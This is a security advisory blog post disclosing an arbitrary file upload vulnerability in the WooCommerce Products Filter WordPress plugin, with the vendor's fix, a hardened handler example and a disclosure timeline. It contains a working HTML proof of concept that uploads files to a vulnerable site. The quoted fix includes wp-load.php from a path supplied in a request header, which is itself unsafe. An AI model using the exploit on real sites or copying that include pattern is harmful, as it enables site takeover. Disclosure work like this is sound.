8 Jul 2016

Arbitrary File Upload Vulnerability in WooCommerce Products Filter

The importance of security obviously varies widely between websites, but eCommerce websites are one type where security seems to be fairly important. When it comes to WordPress based eCommerce, one of the popular solutions is WooCommerce (which we use on this website). WooCommerce introduces additional security risk, since by default it allows customers to create WordPress accounts, and many of the vulnerabilities being found by us and others these days are only exploitable by someone logged in to WordPress, which a hacker would have a hard time doing on many other WordPress websites. That issue led us to do a quick check over some plugins that work with WooCommerce, and through that we found a vulnerability that would allow anyone logged in to WordPress to change product prices and another, in the plugin WooCommerce Products Filter, that would allow anyone logged in to insert malicious JavaScript on to the website.

We then did a check over a larger group of plugins that are tagged woocommerce on the wordpress.org Plugin Directory, looking for code patterns that could indicate a vulnerability exists in the plugin. In doing that we found an arbitrary file upload vulnerability in WooCommerce Products Filter. With that type of vulnerability a hacker could upload malicious code to the website and then do basically anything they want with the website. That type of vulnerability is probably the most likely to be exploited, so finding one in a plugin with 10,000+ active installs (according to wordpress.org) was concerning. But it was better to catch it now than to catch it after a hacker had discovered it and started exploiting it, as we have repeatedly had to do over the last couple of months.

The vulnerability stems from the functionality to upload custom extensions in .zip files. The uploading for that is handled through the file /lib/simple-ajax-uploader/action.php, which didn’t contain any restriction on who can access the upload functionality.

After we notified the developer of the vulnerability, they released version 1.1.5, which added code to check whether the upload attempt is being made by someone with the manage_options capability (which only Administrator level users normally have):

//upload protection
if (isset($_SERVER['HTTP_ABSPATH']))
{
    // Bootstrap WordPress from the path supplied in the ABSPATH request header
    require($_SERVER['HTTP_ABSPATH'] . 'wp-load.php');
    wp();
    // Only users with manage_options (normally Administrators) may continue
    if (!current_user_can('manage_options'))
    {
        return;
    }
} else
{
    // Without the ABSPATH header WordPress cannot be loaded, so refuse the upload
    return;
}

The plugin still doesn’t contain protection against cross-site request forgery (CSRF) for the upload, though.
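As an illustration of how the capability check added in 1.1.5 and the CSRF protection the plugin still lacks fit together, here is an upload handler that does both. This is an added example written for this post, not the plugin's code: the action name woof_example_ext_upload, the nonce action woof_example_upload_nonce, the script handle woof-example-uploader and the form field name ext_zip are all assumed names, and the handler stores the archive in the uploads directory rather than in the plugin's lib/ directory.

```php
<?php
// Added example, not the plugin's code. Names prefixed "woof_example" are assumed.

// Register the handler with WordPress's admin-ajax endpoint. WordPress bootstraps
// itself before calling the handler, so no custom wp-load.php include driven by
// a request header is needed, and using wp_ajax_* without a wp_ajax_nopriv_*
// counterpart means logged-out visitors never reach the function at all.
add_action( 'wp_ajax_woof_example_ext_upload', 'woof_example_handle_ext_upload' );

function woof_example_handle_ext_upload() {
    // Authorization: the same capability check the 1.1.5 fix added.
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_send_json_error( array( 'message' => 'Insufficient permissions.' ), 403 );
    }

    // CSRF protection: the request must carry a nonce created for this action and
    // the current user, which a page on another site cannot obtain.
    // check_ajax_referer() ends the request if the nonce is missing or invalid.
    check_ajax_referer( 'woof_example_upload_nonce', 'nonce' );

    if ( empty( $_FILES['ext_zip'] ) || UPLOAD_ERR_OK !== $_FILES['ext_zip']['error'] ) {
        wp_send_json_error( array( 'message' => 'No file was uploaded.' ), 400 );
    }

    // Accept only zip archives; wp_handle_upload() checks the extension against
    // the file contents (via wp_check_filetype_and_ext) using this mime list.
    $overrides = array(
        'test_form' => false, // the request is an AJAX post, not a plain HTML form
        'mimes'     => array( 'zip' => 'application/zip' ),
    );

    require_once ABSPATH . 'wp-admin/includes/file.php';
    $result = wp_handle_upload( $_FILES['ext_zip'], $overrides );

    if ( isset( $result['error'] ) ) {
        wp_send_json_error( array( 'message' => $result['error'] ), 400 );
    }

    // $result['file'] is the stored path under wp-content/uploads; an extension
    // loader would process the archive from there.
    wp_send_json_success( array( 'file' => basename( $result['file'] ) ) );
}

// On the plugin's own admin page, hand the endpoint and a fresh nonce to the
// uploader script so that legitimate requests can include it.
add_action( 'admin_enqueue_scripts', 'woof_example_enqueue_uploader' );

function woof_example_enqueue_uploader() {
    // Assumed: the script handle is registered by the plugin's settings page.
    wp_localize_script(
        'woof-example-uploader',
        'woofExampleUpload',
        array(
            'ajax_url' => admin_url( 'admin-ajax.php' ),
            'action'   => 'woof_example_ext_upload',
            'nonce'    => wp_create_nonce( 'woof_example_upload_nonce' ),
        )
    );
}
```

Against a handler like this, a page hosted elsewhere that posts a file on behalf of a logged-in administrator, as the proof of concept below does, fails at check_ajax_referer() because it cannot supply a valid nonce, while a logged-out request is rejected before the function runs.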

Proof of Concept

The following proof of concept will upload the selected zip file and place the file zipped up inside it into the directory /wp-content/plugins/woocommerce-products-filter/lib/.

Make sure to replace “[path to WordPress]” with the location of WordPress.

<html>
<head>
<script type="text/javascript" src="http://[path to WordPress]/wp-includes/js/jquery/jquery.js"></script>
<script type="text/javascript" src="http://[path to WordPress]/wp-includes/js/jquery/ui/core.min.js"></script>
<script type="text/javascript" src="http://[path to WordPress]/wp-includes/js/jquery/ui/widget.min.js"></script>
<script type="text/javascript" src="http://[path to WordPress]/wp-includes/js/jquery/ui/mouse.min.js"></script>
<script type="text/javascript" src="http://[path to WordPress]/wp-includes/js/jquery/ui/sortable.min.js"></script>
<script type="text/javascript" src="http://[path to WordPress]/wp-content/plugins/woocommerce-products-filter/lib/simple-ajax-uploader/SimpleAjaxUploader.min.js"></script>
<script type="text/javascript" src="http://[path to WordPress]/wp-content/plugins/woocommerce-products-filter/lib/simple-ajax-uploader/action.js"></script>
<script type="text/javascript" src="http://[path to WordPress]/wp-content/plugins/woocommerce-products-filter/js/modernizr.js"></script>
<script type="text/javascript" src="http://[path to WordPress]/wp-content/plugins/woocommerce-products-filter/js/plugin_options.js"></script>
</head>
<body>
<script>
 jQuery(function ($) {
 woof_init_ext_uploader("../", "http://[path to WordPress]/wp-content/plugins/woocommerce-products-filter/lib/simple-ajax-uploader/action.php");
 });
</script>
<div id="pic-progress-wrap"></div>
<div id="errormsg"></div>
<input type="button" id="upload-btn" class="button" value="Choose a zip file">
</body>
</html>

Timeline

  • 7/5/2016 – Developer notified.
  • 7/7/2016 – Version 1.1.5 released, which fixes vulnerability.

Concerned About The Security of the Plugins You Use?

When you are a paying customer of our service, you can suggest/vote for the WordPress plugins you use to receive a security review from us. You can start using the service for free when you sign up now. We also offer security reviews of WordPress plugins as a separate service.
